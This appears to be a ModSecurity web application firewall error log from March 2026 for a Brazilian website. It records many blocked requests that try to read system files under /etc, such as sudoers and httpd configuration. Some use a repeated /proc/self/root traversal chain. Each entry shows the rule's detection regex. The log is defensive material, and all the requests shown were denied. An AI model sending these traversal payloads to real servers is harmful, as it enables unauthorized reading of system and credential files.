[Thu Mar 19 11:45:43.151651 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:43744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMF9a6ubjKNq_cu4ZbygAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:43.223381 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.58:36920] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMF9a6ubjKNq_cu4ZbywAAA1g"]
[Thu Mar 19 11:45:43.596497 2026] [:error] [pid 31803:tid 140411658000128] [client 57.141.18.65:36924] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMF-yqAr6etmhZHNpmyQAAAEo"]
[Thu Mar 19 11:45:43.670626 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.47:36928] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMF9a6ubjKNq_cu4ZbzAAAA0s"]
[Thu Mar 19 11:45:43.985237 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.6:36932] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMF9a6ubjKNq_cu4ZbzgAAA0E"]
[Thu Mar 19 11:45:44.193241 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.86:36938] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGAkwaGbbGflqUZDKBAAAAMg"]
[Thu Mar 19 11:45:44.496236 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:43754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMGNa6ubjKNq_cu4Zb0AAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:44.864440 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.75:36952] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGAkwaGbbGflqUZDKBgAAAM8"]
[Thu Mar 19 11:45:46.900800 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.241.31:43768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMGQbLMZ6AikZjR9VjzgAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:46.905143 2026] [:error] [pid 17887:tid 140411658000128] [client 57.141.18.13:36964] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGQkwaGbbGflqUZDKCAAAAMo"]
[Thu Mar 19 11:45:46.906172 2026] [:error] [pid 17653:tid 140411674785536] [client 57.141.18.118:36972] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGcdf6f5d65gmYZR-UgAAAsg"]
[Thu Mar 19 11:45:46.906463 2026] [:error] [pid 27403:tid 140411624429312] [client 57.141.18.119:36978] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGhkFeYa1D6dYQnD3MgAAAc4"]
[Thu Mar 19 11:45:46.912723 2026] [:error] [pid 27403:tid 140411725141760] [client 57.141.18.105:36982] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGhkFeYa1D6dYQnD3MwAAAcI"]
[Thu Mar 19 11:45:47.084068 2026] [:error] [pid 27403:tid 140411632822016] [client 57.141.18.123:37000] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMGxkFeYa1D6dYQnD3NgAAAc0"]
[Thu Mar 19 11:45:47.368052 2026] [:error] [pid 27293:tid 140411548894976] [client 57.141.18.0:37006] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMG_-YZRR_7pZ7nDKSIQAAA9c"]
[Thu Mar 19 11:45:47.811900 2026] [:error] [pid 30077:tid 140411590858496] [client 57.141.18.6:37024] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMG_u8EFLIOrSqIput8AAAAlI"]
[Thu Mar 19 11:45:48.529153 2026] [:error] [pid 27403:tid 140411699963648] [client 57.141.18.1:37042] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHBkFeYa1D6dYQnD3OgAAAcU"]
[Thu Mar 19 11:45:48.622563 2026] [:error] [pid 27403:tid 140411599251200] [client 57.141.18.94:37046] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHBkFeYa1D6dYQnD3OwAAAdE"]
[Thu Mar 19 11:45:48.957589 2026] [:error] [pid 31803:tid 140411733534464] [client 57.141.18.98:37050] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHOyqAr6etmhZHNpmywAAAEE"]
[Thu Mar 19 11:45:49.039776 2026] [:error] [pid 27403:tid 140411624429312] [client 57.141.18.33:37054] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHRkFeYa1D6dYQnD3PQAAAc4"]
[Thu Mar 19 11:45:49.588269 2026] [:error] [pid 31803:tid 140411624429312] [client 57.141.18.80:37062] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHeyqAr6etmhZHNpmzAAAAE4"]
[Thu Mar 19 11:45:49.639270 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:51348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMHf-YZRR_7pZ7nDKSIwAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:50.224271 2026] [:error] [pid 31803:tid 140411691570944] [client 57.141.18.40:37082] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHuyqAr6etmhZHNpmzwAAAEY"]
[Thu Mar 19 11:45:50.445362 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.69:37088] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHgbLMZ6AikZjR9VjzwAAABM"]
[Thu Mar 19 11:45:50.766407 2026] [:error] [pid 14269:tid 140411557287680] [client 57.141.18.84:37094] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHgbLMZ6AikZjR9Vj0AAAABY"]
[Thu Mar 19 11:45:50.944420 2026] [:error] [pid 27293:tid 140411691570944] [client 57.141.18.54:37100] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMHv-YZRR_7pZ7nDKSJQAAA8Y"]
[Thu Mar 19 11:45:51.479768 2026] [:error] [pid 30077:tid 140411741927168] [client 57.141.18.33:37118] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMH_u8EFLIOrSqIput8gAAAkA"]
[Thu Mar 19 11:45:51.866477 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.112:37124] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMH-oXxyEfFpUF8f8USAAAAUA"]
